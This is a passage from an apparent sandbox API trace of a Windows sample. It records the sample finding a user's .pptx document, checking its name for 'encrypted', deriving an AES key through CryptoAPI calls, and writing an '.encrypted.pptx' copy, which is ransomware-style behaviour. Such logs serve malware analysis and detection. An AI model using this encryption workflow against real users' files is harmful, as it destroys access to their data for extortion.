cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0x7c20c0 [0036.287] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.287] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0xd5dc2a40, ftLastWriteTime.dwHighDateTime=0x1d5beed, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0x7c20c0 [0036.287] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.287] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yzi.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.290] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.290] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.290] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.290] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.290] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.290] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.290] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.290] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0xd5dc2a40, ftLastWriteTime.dwHighDateTime=0x1d5beed, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0x7c2100 [0036.290] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.290] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.290] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.290] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.291] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.291] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.291] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.291] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.291] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0036.292] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.292] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.292] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.292] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.293] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.293] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.293] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.293] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0036.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.293] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\n-yzi.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.294] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.294] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\n-yzi.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: 